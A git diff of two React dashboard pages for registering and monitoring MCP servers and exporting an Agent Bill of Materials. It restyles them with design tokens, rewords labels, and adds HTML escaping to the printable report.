+                        <span className="text-sm text-ink-secondary">
                           Not verified
                         </span>
                       </div>
@@ -662,7 +664,7 @@ export default function MCPServersPage() {
                     <div className="flex items-center gap-2">
                       <button
                         onClick={() => handleViewMCP(server)}
-                        className="p-1 text-gray-400 hover:text-blue-600 dark:hover:text-blue-400 transition-colors"
+                        className="p-1 text-ink-tertiary hover:text-brand-text transition-colors"
                         title="View details"
                       >
                         <Eye className="h-4 w-4" />
@@ -672,7 +674,7 @@ export default function MCPServersPage() {
                         userRole === "member") && (
                         <button
                           onClick={() => handleEditMCP(server)}
-                          className="p-1 text-gray-400 hover:text-yellow-600 dark:hover:text-yellow-400 transition-colors"
+                          className="p-1 text-ink-tertiary hover:text-warning-text transition-colors"
                           title="Edit"
                         >
                           <Edit className="h-4 w-4" />
@@ -681,7 +683,7 @@ export default function MCPServersPage() {
                       {(userRole === "admin" || userRole === "manager") && (
                         <button
                           onClick={() => requestDeleteMCP(server)}
-                          className="p-1 text-gray-400 hover:text-red-600 dark:hover:text-red-400 transition-colors"
+                          className="p-1 text-ink-tertiary hover:text-danger-text transition-colors"
                           title="Delete"
                         >
                           <Trash2 className="h-4 w-4" />
@@ -696,29 +698,29 @@ export default function MCPServersPage() {
         </div>
         {mcpServers.length === 0 && (
           <div className="text-center py-12 space-y-6">
-            <Server className="mx-auto h-12 w-12 text-gray-400" />
+            <Server className="mx-auto h-12 w-12 text-ink-tertiary" />
             <div>
-              <h3 className="text-sm font-medium text-gray-900 dark:text-gray-100">
+              <h3 className="text-sm font-medium text-ink">
                 No MCP servers registered
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 Get started by registering your first MCP server.
               </p>
             </div>
 
             <div className="max-w-lg mx-auto space-y-3">
-              <div className="bg-gray-50 dark:bg-gray-800 rounded-md p-4 text-left">
-                <p className="font-medium text-sm text-gray-900 dark:text-gray-100 mb-1">Option 1: Register via SDK</p>
-                <p className="text-xs text-gray-500 dark:text-gray-400">
+              <div className="glass-inset p-4 text-left">
+                <p className="font-medium text-sm text-ink mb-1">Option 1: Register via SDK</p>
+                <p className="text-xs text-ink-secondary">
                   Use the AIM SDK to automatically register MCP servers when your agent connects to them.
                 </p>
-                <code className="text-xs bg-gray-100 dark:bg-gray-700 px-2 py-1 rounded block mt-2 text-gray-700 dark:text-gray-300">
-                  agent.attest_mcp("server-name", "https://mcp.example.com")
+                <code className="text-xs bg-glass-inset-gray px-2 py-1 rounded-md block mt-2 font-mono text-ink-body">
+                  agent.attest_mcp("&lt;server-id&gt;", mcp_url="https://mcp.example.com", mcp_name="server-name")
                 </code>
               </div>
-              <div className="bg-gray-50 dark:bg-gray-800 rounded-md p-4 text-left">
-                <p className="font-medium text-sm text-gray-900 dark:text-gray-100 mb-1">Option 2: Manual registration</p>
-                <p className="text-xs text-gray-500 dark:text-gray-400">
+              <div className="glass-inset p-4 text-left">
+                <p className="font-medium text-sm text-ink mb-1">Option 2: Manual registration</p>
+                <p className="text-xs text-ink-secondary">
                   Click the button below to manually register an MCP server with its URL and details.
                 </p>
               </div>
@@ -726,24 +728,24 @@ export default function MCPServersPage() {
 
             <button
               onClick={() => setShowRegisterModal(true)}
-              className="inline-flex items-center gap-2 px-4 py-2 bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors"
+              className="inline-flex items-center gap-2 px-4 py-2 rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover transition-colors"
             >
               <Plus className="h-4 w-4" />
-              Register MCP Server
+              Register MCP server
             </button>
 
-            <p className="text-xs text-gray-500 dark:text-gray-400">
-              See the <a href="https://opena2a.org/docs/integration/python" className="underline hover:text-gray-700 dark:hover:text-gray-300">SDK documentation</a> for more details.
+            <p className="text-xs text-ink-secondary">
+              See the <a href="https://opena2a.org/docs/integration/python" className="underline hover:text-ink">SDK documentation</a> for more details.
             </p>
           </div>
         )}
         {mcpServers.length > 0 && filteredServers.length === 0 && (
           <div className="text-center py-12">
-            <Search className="mx-auto h-12 w-12 text-gray-400" />
-            <h3 className="mt-2 text-sm font-medium text-gray-900 dark:text-gray-100">
+            <Search className="mx-auto h-12 w-12 text-ink-tertiary" />
+            <h3 className="mt-2 text-sm font-medium text-ink">
               No servers found
             </h3>
-            <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+            <p className="mt-1 text-sm text-ink-secondary">
               Try adjusting your search or filter criteria.
             </p>
             <button
@@ -751,7 +753,7 @@ export default function MCPServersPage() {
                 setSearchTerm("");
                 setStatusFilter("all");
               }}
-              className="mt-4 px-4 py-2 text-blue-600 dark:text-blue-400 hover:underline"
+              className="mt-4 px-4 py-2 text-brand-text hover:underline"
             >
               Clear filters
             </button>
@@ -759,15 +761,15 @@ export default function MCPServersPage() {
         )}
         {/* Pagination Controls */}
         {filteredServers.length > 0 && (
-          <div className="px-6 py-4 border-t border-gray-200 dark:border-gray-700 flex items-center justify-between">
-            <div className="text-sm text-gray-500 dark:text-gray-400">
+          <div className="px-6 py-4 border-t border-divider flex items-center justify-between">
+            <div className="text-sm text-ink-secondary">
               Showing {paginatedServers.length} of {filteredServers.length} servers
             </div>
             <div className="flex gap-2">
               {currentPage > 1 && (
                 <button
                   onClick={() => setCurrentPage(1)}
-                  className="px-4 py-2 text-sm text-gray-600 dark:text-gray-300 hover:text-gray-900 dark:hover:text-white border border-gray-300 dark:border-gray-600 rounded-lg hover:bg-gray-50 dark:hover:bg-gray-800 transition-colors"
+                  className="px-4 py-2 text-sm text-ink-body hover:text-ink border border-stroke rounded-pill hover:bg-glass-inset-gray transition-colors"
                 >
                   Show Less
                 </button>
@@ -775,7 +777,7 @@ export default function MCPServersPage() {
               {hasMore && (
                 <button
                   onClick={() => setCurrentPage(currentPage + 1)}
-                  className="px-4 py-2 text-sm bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors"
+                  className="px-4 py-2 text-sm rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover transition-colors"
                 >
                   Load More
                 </button>
@@ -786,18 +788,18 @@ export default function MCPServersPage() {
       </div>
 
       {/* Info Card */}
-      <div className="bg-blue-50 dark:bg-blue-900/20 border border-blue-200 dark:border-blue-800 rounded-lg p-6">
+      <div className="glass p-6">
         <div className="flex items-start gap-4">
           <div className="flex-shrink-0">
-            <Shield className="h-6 w-6 text-blue-600 dark:text-blue-400" />
+            <Shield className="h-6 w-6 text-brand-text" />
           </div>
           <div>
-            <h3 className="text-sm font-medium text-blue-900 dark:text-blue-100">
-              About MCP Server Verification
+            <h3 className="text-sm font-medium text-ink">
+              About MCP server verification
             </h3>
-            <p className="mt-2 text-sm text-blue-700 dark:text-blue-300">
-              Model Context Protocol (MCP) servers must be verified before they
-              can interact with AI agents. Cryptographic verification uses
+            <p className="mt-2 text-sm text-ink-body">
+              Model Context Protocol (MCP) servers can be required to pass
+              verification before agents use them, through an MCP security policy. Cryptographic verification uses
               public key infrastructure to ensure servers meet security
               standards and operate within defined boundaries. Regular
               re-verification is recommended to maintain trust scores.
@@ -831,7 +833,7 @@ export default function MCPServersPage() {
 
       <ConfirmDialog
         isOpen={showDeleteConfirm}
-        title="Delete MCP Server"
+        title="Delete MCP server"
         message={`Are you sure you want to delete "${
           deleteTarget?.name ?? "this MCP server"
         }"? This action cannot be undone.`}

--- a/apps/web/app/dashboard/mcp/supply-chain/page.tsx
+++ b/apps/web/app/dashboard/mcp/supply-chain/page.tsx
@@ -62,6 +62,7 @@ import {
   Legend,
 } from "recharts";
 import { api } from "@/lib/api";
+import { escapeHtml } from "@/lib/html-escape";
 import { formatDateTime } from "@/lib/date-utils";
 import { AuthGuard } from "@/components/auth-guard";
 
@@ -107,19 +108,19 @@ interface SupplyChainStats {
 
 // Colors for charts
 const CHART_COLORS = {
-  primary: "#3b82f6",
-  success: "#22c55e",
-  warning: "#f59e0b",
-  danger: "#ef4444",
-  info: "#06b6d4",
-  purple: "#8b5cf6",
+  primary: "var(--brand)",
+  success: "var(--green)",
+  warning: "var(--amber)",
+  danger: "var(--red)",
+  info: "var(--brand-sky)",
+  purple: "var(--brand-indigo)",
 };
 
 const CONFIDENCE_COLORS = [
-  { range: "90-100%", color: "#22c55e", fill: "#dcfce7" },
-  { range: "70-89%", color: "#3b82f6", fill: "#dbeafe" },
-  { range: "50-69%", color: "#f59e0b", fill: "#fef3c7" },
-  { range: "0-49%", color: "#ef4444", fill: "#fee2e2" },
+  { range: "90-100%", color: "var(--green)", fill: "var(--green-fill)" },
+  { range: "70-89%", color: "var(--brand)", fill: "var(--brand-soft)" },
+  { range: "50-69%", color: "var(--amber)", fill: "var(--amber-fill)" },
+  { range: "0-49%", color: "var(--red)", fill: "var(--red-fill)" },
 ];
 
 function StatCard({
@@ -129,9 +130,9 @@ function StatCard({
   change,
   changeType,
   suffix,
-  iconBg = "bg-gray-100 dark:bg-gray-700",
-  iconColor = "text-gray-500 dark:text-gray-400",
-  valueColor = "text-gray-900 dark:text-gray-100",
+  iconBg = "bg-glass-inset-gray",
+  iconColor = "text-ink-secondary",
+  valueColor = "text-ink",
 }: {
   icon: any;
   label: string;
@@ -144,21 +145,21 @@ function StatCard({
   valueColor?: string;
 }) {
   return (
-    <div className="bg-white dark:bg-gray-800 p-6 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm">
+    <div className="glass p-6">
       <div className="flex items-center">
         <div className={`flex-shrink-0 p-2 rounded-lg ${iconBg}`}>
           <Icon className={`h-5 w-5 ${iconColor}`} />
         </div>
         <div className="ml-4 w-0 flex-1">
           <dl>
-            <dt className="text-sm font-medium text-gray-500 dark:text-gray-400 truncate">
+            <dt className="text-sm font-medium text-ink-secondary truncate">
               {label}
             </dt>
             <dd className="flex items-baseline">
               <div className={`text-2xl font-semibold ${valueColor}`}>
                 {value}
                 {suffix && (
-                  <span className="text-lg font-normal text-gray-500 ml-1">
+                  <span className="text-lg font-normal text-ink-secondary ml-1">
                     {suffix}
                   </span>
                 )}
@@ -167,10 +168,10 @@ function StatCard({
                 <div
                   className={`ml-2 flex items-baseline text-sm font-semibold ${
                     changeType === "positive"
-                      ? "text-green-600"
+                      ? "text-success-text"
                       : changeType === "negative"
-                      ? "text-red-600"
-                      : "text-gray-500"
+                      ? "text-danger-text"
+                      : "text-ink-secondary"
                   }`}
                 >
                   {changeType === "positive" && (
@@ -195,20 +196,20 @@ function StatusBadge({ status }: { status: string }) {
     switch (status.toLowerCase()) {
       case "verified":
       case "active":
-        return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
+        return "bg-success-fill text-success-text";
       case "pending":
-        return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
+        return "bg-warning-fill text-warning-text";
       case "inactive":
       case "revoked":
-        return "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300";
+        return "bg-danger-fill text-danger-text";
       default:
-        return "bg-gray-100 dark:bg-gray-900/30 text-gray-800 dark:text-gray-300";
+        return "bg-glass-inset-gray text-ink-body";
     }
   };
 
   return (
     <span
-      className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${getStatusStyles(
+      className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium ${getStatusStyles(
         status
       )}`}
     >
@@ -220,17 +221,17 @@ function StatusBadge({ status }: { status: string }) {
 function ConfidenceScoreBadge({ score }: { score: number }) {
   const getScoreStyles = (score: number) => {
     if (score >= 90)
-      return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
+      return "bg-success-fill text-success-text";
     if (score >= 70)
-      return "bg-blue-100 dark:bg-blue-900/30 text-blue-800 dark:text-blue-300";
+      return "bg-brand-soft text-brand-text";
     if (score >= 50)
-      return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
-    return "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300";
+      return "bg-warning-fill text-warning-text";
+    return "bg-danger-fill text-danger-text";
   };
 
   return (
     <span
-      className={`inline-flex items-center px-2.5 py-0.5 rounded-full text-xs font-medium ${getScoreStyles(
+      className={`inline-flex items-center px-2.5 py-0.5 rounded-pill text-xs font-medium ${getScoreStyles(
         score
       )}`}
     >
@@ -703,6 +704,8 @@ function SupplyChainPage() {
 
   // Generate printable HTML for PDF
   const generateABOMPrintHTML = (data: ABOMData): string => {
+    // Every data value is escaped: the report is written into a same-origin window.
+    const esc = escapeHtml;
     return `
       <!DOCTYPE html>
       <html>
@@ -733,7 +736,7 @@ function SupplyChainPage() {
         <h1>Agent Bill of Materials (ABOM)</h1>
         <div class="meta">
           <p>Generated: ${new Date(data.generatedAt).toLocaleString()}</p>
-          <p>Version: ${data.version}</p>
+          <p>Version: ${esc(data.version)}</p>
         </div>
 
         <h2>Summary</h2>
@@ -748,14 +751,14 @@ function SupplyChainPage() {
 
         <h2>Agents Inventory</h2>
         <table>
-          <tr><th>Name</th><th>Status</th><th>Trust Score</th><th>Capabilities</th><th>Data Access</th></tr>
+          <tr><th>Name</th><th>Status</th><th>Trust score</th><th>Capabilities</th><th>Data access</th></tr>
           ${data.agents.map((a) => `
             <tr>
-              <td>${a.name}</td>
-              <td><span class="badge badge-${a.status === "active" ? "green" : "yellow"}">${a.status}</span></td>
-              <td>${a.trustScore}%</td>
-              <td>${(a.capabilities || []).map((c) => `<span class="badge badge-blue">${c}</span>`).join(" ")}</td>
-              <td>${(a.dataAccess || []).map((d) => `<span class="badge badge-yellow">${d}</span>`).join(" ")}</td>
+              <td>${esc(a.name)}</td>
+              <td><span class="badge badge-${a.status === "active" ? "green" : "yellow"}">${esc(a.status)}</span></td>
+              <td>${Math.round((a.trustScore || 0) * 100)}%</td>
+              <td>${(a.capabilities || []).map((c) => `<span class="badge badge-blue">${esc(c)}</span>`).join(" ")}</td>
+              <td>${(a.dataAccess || []).map((d) => `<span class="badge badge-yellow">${esc(d)}</span>`).join(" ")}</td>
             </tr>
           `).join("")}
         </table>
@@ -765,9 +768,9 @@ function SupplyChainPage() {
           <tr><th>Name</th><th>URL</th><th>Status</th><th>Tools</th><th>Attestations</th></tr>
           ${data.mcpServers.map((s) => `
             <tr>
-              <td>${s.name}</td>
-              <td style="font-size:12px;color:#6b7280;">${s.url}</td>
-              <td><span class="badge badge-${s.status === "verified" ? "green" : "yellow"}">${s.status}</span></td>
+              <td>${esc(s.name)}</td>
+              <td style="font-size:12px;color:#6b7280;">${esc(s.url)}</td>
+              <td><span class="badge badge-${s.status === "verified" ? "green" : "yellow"}">${esc(s.status)}</span></td>
               <td>${s.toolCount || 0}</td>
               <td>${s.attestationCount || 0}</td>
             </tr>
@@ -779,9 +782,9 @@ function SupplyChainPage() {
           <tr><th>Agent</th><th>MCP Server</th><th>Type</th><th>Attestations</th><th>Status</th></tr>
           ${data.connections.map((c) => `
             <tr>
-              <td>${c.agentName}</td>
-              <td>${c.mcpServerName}</td>
-              <td>${c.connectionType}</td>
+              <td>${esc(c.agentName)}</td>
+              <td>${esc(c.mcpServerName)}</td>
+              <td>${esc(c.connectionType)}</td>
               <td>${c.attestationCount}</td>
               <td><span class="badge badge-${c.isActive ? "green" : "yellow"}">${c.isActive ? "Active" : "Inactive"}</span></td>
             </tr>
@@ -801,8 +804,8 @@ function SupplyChainPage() {
     return (
       <div className="min-h-screen flex items-center justify-center">
         <div className="text-center">
-          <Loader2 className="h-8 w-8 animate-spin text-blue-500 mx-auto mb-4" />
-          <p className="text-gray-500 dark:text-gray-400">
+          <Loader2 className="h-8 w-8 animate-spin text-brand-text mx-auto mb-4" />
+          <p className="text-ink-secondary">
             Loading supply chain data...
           </p>
         </div>
@@ -811,16 +814,16 @@ function SupplyChainPage() {
   }
 
   return (
-    <div className="min-h-screen bg-gray-50 dark:bg-gray-900 p-6">
+    <div className="min-h-screen p-6">
       {/* Header */}
       <div className="mb-6">
         <div className="flex items-center justify-between">
           <div>
-            <h1 className="text-3xl font-bold text-gray-900 dark:text-white flex items-center gap-3">
-              <GitBranch className="h-8 w-8 text-blue-500" />
-              Supply Chain & ABOM
+            <h1 className="text-3xl font-bold text-ink flex items-center gap-3">
+              <GitBranch className="h-8 w-8 text-brand-text" />
+              Supply chain & ABOM
             </h1>
-            <p className="mt-2 text-gray-600 dark:text-gray-400">
+            <p className="mt-2 text-ink-secondary">
               Monitor MCP server dependencies, attestation health, and your Agent Bill of Materials.
             </p>
           </div>
@@ -828,7 +831,7 @@ function SupplyChainPage() {
             <button
               onClick={() => fetchData(true)}
               disabled={refreshing}
-              className="inline-flex items-center px-4 py-2 border border-gray-300 dark:border-gray-600 rounded-md shadow-sm text-sm font-medium text-gray-700 dark:text-gray-200 bg-white dark:bg-gray-800 hover:bg-gray-50 dark:hover:bg-gray-700 disabled:opacity-50"
+              className="inline-flex items-center px-4 py-2 border border-stroke rounded-pill text-sm font-medium text-ink-body hover:bg-glass-inset-gray disabled:opacity-50"
             >
               <RefreshCw
                 className={`h-4 w-4 mr-2 ${refreshing ? "animate-spin" : ""}`}
@@ -838,10 +841,10 @@ function SupplyChainPage() {
             {activeTab === "analytics" ? (
               <button
                 onClick={handleExport}
-                className="inline-flex items-center px-4 py-2 border border-transparent rounded-md shadow-sm text-sm font-medium text-white bg-blue-600 hover:bg-blue-700"
+                className="inline-flex items-center px-4 py-2 rounded-pill bg-brand text-sm font-medium text-white shadow-glow hover:bg-brand-hover"
               >
                 <Download className="h-4 w-4 mr-2" />
-                Export Report
+                Export report
               </button>
             ) : (
               <div className="relative">
@@ -850,23 +853,23 @@ function SupplyChainPage() {
                     const dropdown = document.getElementById("abom-export-dropdown");
                     if (dropdown) dropdown.classList.toggle("hidden");
                   }}
-                  className="inline-flex items-center px-4 py-2 border border-transparent rounded-md shadow-sm text-sm font-medium text-white bg-blue-600 hover:bg-blue-700"
+                  className="inline-flex items-center px-4 py-2 rounded-pill bg-brand text-sm font-medium text-white shadow-glow hover:bg-brand-hover"
                 >
                   <Download className="h-4 w-4 mr-2" />
                   Export ABOM
                 </button>
                 <div
                   id="abom-export-dropdown"
-                  className="hidden absolute right-0 mt-2 w-48 bg-white dark:bg-gray-800 rounded-md shadow-lg border border-gray-200 dark:border-gray-700 z-10"
+                  className="hidden absolute right-0 mt-2 w-48 glass-chrome overflow-hidden z-10"
                 >
                   <button
                     onClick={() => {
                       handleExportABOM("json");
                       document.getElementById("abom-export-dropdown")?.classList.add("hidden");
                     }}
-                    className="flex items-center w-full px-4 py-2 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700"
+                    className="flex items-center w-full px-4 py-2 text-sm text-ink-body hover:bg-glass-inset-gray"
                   >
-                    <FileJson className="h-4 w-4 mr-2 text-blue-500" />
+                    <FileJson className="h-4 w-4 mr-2 text-brand-text" />
                     Export as JSON
                   </button>
                   <button
@@ -874,9 +877,9 @@ function SupplyChainPage() {
                       handleExportABOM("yaml");
                       document.getElementById("abom-export-dropdown")?.classList.add("hidden");
                     }}
-                    className="flex items-center w-full px-4 py-2 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700"
+                    className="flex items-center w-full px-4 py-2 text-sm text-ink-body hover:bg-glass-inset-gray"
                   >
-                    <FileCode className="h-4 w-4 mr-2 text-green-500" />
+                    <FileCode className="h-4 w-4 mr-2 text-success-text" />
                     Export as YAML
                   </button>
                   <button
@@ -884,9 +887,9 @@ function SupplyChainPage() {
                       handleExportABOM("pdf");
                       document.getElementById("abom-export-dropdown")?.classList.add("hidden");
                     }}
-                    className="flex items-center w-full px-4 py-2 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700"
+                    className="flex items-center w-full px-4 py-2 text-sm text-ink-body hover:bg-glass-inset-gray"
                   >
-                    <Printer className="h-4 w-4 mr-2 text-red-500" />
+                    <Printer className="h-4 w-4 mr-2 text-danger-text" />
                     Print / PDF
                   </button>
                 </div>
@@ -898,19 +901,19 @@ function SupplyChainPage() {
 
       {/* Tabs */}
       <div className="mb-6">
-        <div className="border-b border-gray-200 dark:border-gray-700">
+        <div className="border-b border-divider">
           <nav className="-mb-px flex space-x-8">
             <button
               onClick={() => setActiveTab("analytics")}
               className={`py-4 px-1 border-b-2 font-medium text-sm flex items-center gap-2 ${
                 activeTab === "analytics"
-                  ? "border-blue-500 text-blue-600 dark:text-blue-400"
-                  : "border-transparent text-gray-500 hover:text-gray-700 hover:border-gray-300 dark:text-gray-400 dark:hover:text-gray-300"
+                  ? "border-brand text-brand-text"
+                  : "border-transparent text-ink-secondary hover:text-ink hover:border-stroke"
               }`}
             >
               <BarChart3 className="h-4 w-4" />
               Analytics
-              <span className="ml-1 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+              <span className="ml-1 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                 {stats?.totalMCPServers || 0}
               </span>
             </button>
@@ -918,13 +921,13 @@ function SupplyChainPage() {
               onClick={() => setActiveTab("abom")}
               className={`py-4 px-1 border-b-2 font-medium text-sm flex items-center gap-2 ${
                 activeTab === "abom"
-                  ? "border-blue-500 text-blue-600 dark:text-blue-400"
-                  : "border-transparent text-gray-500 hover:text-gray-700 hover:border-gray-300 dark:text-gray-400 dark:hover:text-gray-300"
+                  ? "border-brand text-brand-text"
+                  : "border-transparent text-ink-secondary hover:text-ink hover:border-stroke"
               }`}
             >
               <Package className="h-4 w-4" />
               ABOM
-              <span className="ml-1 px-2 py-0.5 text-xs font-medium bg-blue-100 dark:bg-blue-900/30 text-blue-600 dark:text-blue-300 rounded-full">
+              <span className="ml-1 px-2 py-0.5 text-xs font-medium bg-brand-soft text-brand-text rounded-pill">
                 Bill of Materials
               </span>
             </button>
@@ -939,15 +942,15 @@ function SupplyChainPage() {
       <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-4 mb-8">
         <StatCard
           icon={Server}
-          label="Total MCP Servers"
+          label="Total MCP servers"
           value={stats?.totalMCPServers || 0}
-          iconBg="bg-purple-100 dark:bg-purple-900/30"
-          iconColor="text-purple-600 dark:text-purple-400"
-          valueColor="text-purple-600 dark:text-purple-400"
+          iconBg="bg-brand-soft"
+          iconColor="text-brand-indigo"
+          valueColor="text-brand-indigo"
         />
         <StatCard
           icon={Shield}
-          label="Verified Servers"
+          label="Verified servers"
           value={stats?.verifiedServers || 0}
           change={
             stats && stats.totalMCPServers > 0
@@ -955,18 +958,18 @@ function SupplyChainPage() {
               : undefined
           }
           changeType="positive"
-          iconBg="bg-green-100 dark:bg-green-900/30"
-          iconColor="text-green-600 dark:text-green-400"
-          valueColor="text-green-600 dark:text-green-400"
+          iconBg="bg-success-fill"
+          iconColor="text-success-text"
+          valueColor="text-success-text"
         />
         <StatCard
           icon={Link2}
-          label="Active Connections"
+          label="Active connections"
           value={stats?.activeConnections || 0}
           suffix={`/ ${stats?.totalConnections || 0}`}
-          iconBg="bg-cyan-100 dark:bg-cyan-900/30"
-          iconColor="text-cyan-600 dark:text-cyan-400"
-          valueColor="text-cyan-600 dark:text-cyan-400"
+          iconBg="bg-brand-soft"
+          iconColor="text-brand-sky"
+          valueColor="text-brand-sky"
         />
         <StatCard
           icon={AlertCircle}
@@ -975,9 +978,9 @@ function SupplyChainPage() {
           changeType={
             unmappedMcpCount > 0 ? "negative" : "positive"
           }
-          iconBg="bg-orange-100 dark:bg-orange-900/30"
-          iconColor="text-orange-600 dark:text-orange-400"
-          valueColor="text-orange-600 dark:text-orange-400"
+          iconBg="bg-warning-fill"
+          iconColor="text-warning-text"
+          valueColor="text-warning-text"
         />
       </div>
 
@@ -985,54 +988,54 @@ function SupplyChainPage() {
       <div className="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-4 mb-8">
         <StatCard
           icon={Clock}
-          label="Pending Verification"
+          label="Pending verification"
           value={stats?.pendingServers || 0}
           changeType={
             (stats?.pendingServers || 0) > 0 ? "negative" : "positive"
           }
-          iconBg="bg-yellow-100 dark:bg-yellow-900/30"
-          iconColor="text-yellow-600 dark:text-yellow-400"
-          valueColor="text-yellow-600 dark:text-yellow-400"
+          iconBg="bg-warning-fill"
+          iconColor="text-warning-text"
+          valueColor="text-warning-text"
         />
         <StatCard
           icon={Activity}
           label="Attestations (24h)"
           value={stats?.attestationsLast24h || 0}
-          iconBg="bg-blue-100 dark:bg-blue-900/30"
-          iconColor="text-blue-600 dark:text-blue-400"
-          valueColor="text-blue-600 dark:text-blue-400"
+          iconBg="bg-brand-soft"
+          iconColor="text-brand-text"
+          valueColor="text-brand-text"
         />
         <StatCard
           icon={AlertTriangle}
-          label="Capability Drift Alerts"
+          label="Capability drift alerts"
           value={stats?.capabilityDriftAlerts || 0}
           changeType={
             (stats?.capabilityDriftAlerts || 0) > 0 ? "negative" : "positive"
           }
-          iconBg="bg-red-100 dark:bg-red-900/30"
-          iconColor="text-red-600 dark:text-red-400"
-          valueColor="text-red-600 dark:text-red-400"
+          iconBg="bg-danger-fill"
+          iconColor="text-danger-text"
+          valueColor="text-danger-text"
         />
         <StatCard
           icon={Box}
-          label="Unique Capabilities"
+          label="Total tools"
           value={mcpServers.reduce(
             (sum, s) => sum + (s.toolCount || 0),
             0
           )}
-          iconBg="bg-indigo-100 dark:bg-indigo-900/30"
-          iconColor="text-indigo-600 dark:text-indigo-400"
-          valueColor="text-indigo-600 dark:text-indigo-400"
+          iconBg="bg-brand-soft"
+          iconColor="text-brand-indigo"
+          valueColor="text-brand-indigo"
         />
       </div>
 
       {/* Charts Row */}
       <div className="grid grid-cols-1 lg:grid-cols-2 gap-6 mb-8">
         {/* Attestation Trend Chart */}
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
-          <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-4 flex items-center gap-2">
-            <BarChart3 className="h-5 w-5 text-blue-500" />
-            Attestation Activity (7 Days)
+        <div className="glass p-6">
+          <h3 className="text-lg font-semibold text-ink mb-4 flex items-center gap-2">
+            <BarChart3 className="h-5 w-5 text-brand-text" />
+            Attestation activity (7 days)
           </h3>
           <div className="h-64">
             <ResponsiveContainer width="100%" height="100%">
@@ -1059,19 +1062,20 @@ function SupplyChainPage() {
                 </defs>
                 <CartesianGrid
                   strokeDasharray="3 3"
-                  className="stroke-gray-200 dark:stroke-gray-700"
+                  className="stroke-divider"
                 />
                 <XAxis
                   dataKey="date"
-                  tick={{ fill: "#9ca3af", fontSize: 12 }}
+                  tick={{ fill: "var(--text-tertiary)", fontSize: 12 }}
                 />
-                <YAxis tick={{ fill: "#9ca3af", fontSize: 12 }} />
+                <YAxis tick={{ fill: "var(--text-tertiary)", fontSize: 12 }} />
                 <Tooltip
                   contentStyle={{
-                    backgroundColor: "#1f2937",
-                    border: "none",
-                    borderRadius: "8px",
-                    color: "#fff",
+                    backgroundColor: "var(--glass-fill)",
+                    border: "1px solid var(--glass-border)",
+                    borderRadius: "12px",
+                    boxShadow: "var(--shadow-card)",
+                    color: "var(--text-primary)",
                   }}
                 />
                 <Area
@@ -1088,10 +1092,10 @@ function SupplyChainPage() {
         </div>
 
         {/* Confidence Distribution Chart */}
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
-          <h3 className="text-lg font-semibold text-gray-900 dark:text-white mb-4 flex items-center gap-2">
-            <Shield className="h-5 w-5 text-green-500" />
-            Confidence Score Distribution
+        <div className="glass p-6">
+          <h3 className="text-lg font-semibold text-ink mb-4 flex items-center gap-2">
+            <Shield className="h-5 w-5 text-success-text" />
+            Confidence score distribution
           </h3>
           <div className="h-64">
             <ResponsiveContainer width="100%" height="100%">
@@ -1112,16 +1116,17 @@ function SupplyChainPage() {
                 </Pie>
                 <Tooltip
                   contentStyle={{
-                    backgroundColor: "#1f2937",
-                    border: "none",
-                    borderRadius: "8px",
-                    color: "#fff",
+                    backgroundColor: "var(--glass-fill)",
+                    border: "1px solid var(--glass-border)",
+                    borderRadius: "12px",
+                    boxShadow: "var(--shadow-card)",
+                    color: "var(--text-primary)",
                   }}
                 />
                 <Legend
                   wrapperStyle={{ paddingTop: "20px" }}
                   formatter={(value: string) => (
-                    <span className="text-gray-600 dark:text-gray-300 text-sm">
+                    <span className="text-ink-secondary text-sm">
                       {value}
                     </span>
                   )}
@@ -1133,24 +1138,24 @@ function SupplyChainPage() {
       </div>
 
       {/* MCP Servers Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden mb-8">
-        <div className="px-6 py-4 border-b border-gray-200 dark:border-gray-700">
+      <div className="glass overflow-hidden mb-8">
+        <div className="px-6 py-4 border-b border-divider">
           <div className="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-4">
             <div>
-              <h3 className="text-lg font-semibold text-gray-900 dark:text-white flex items-center gap-2">
-                <Server className="h-5 w-5 text-purple-500" />
-                MCP Server Dependencies
-                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-gray-100 dark:bg-gray-700 text-gray-600 dark:text-gray-300 rounded-full">
+              <h3 className="text-lg font-semibold text-ink flex items-center gap-2">
+                <Server className="h-5 w-5 text-brand-indigo" />
+                MCP server dependencies
+                <span className="ml-2 px-2 py-0.5 text-xs font-medium bg-glass-inset-gray text-ink-secondary rounded-pill">
                   {filteredMcpServers.length}
                 </span>
               </h3>
-              <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">
+              <p className="mt-1 text-sm text-ink-secondary">
                 All MCP servers in your supply chain with their attestation status
               </p>
             </div>
             <div className="flex flex-col sm:flex-row gap-2">
               <div className="relative">
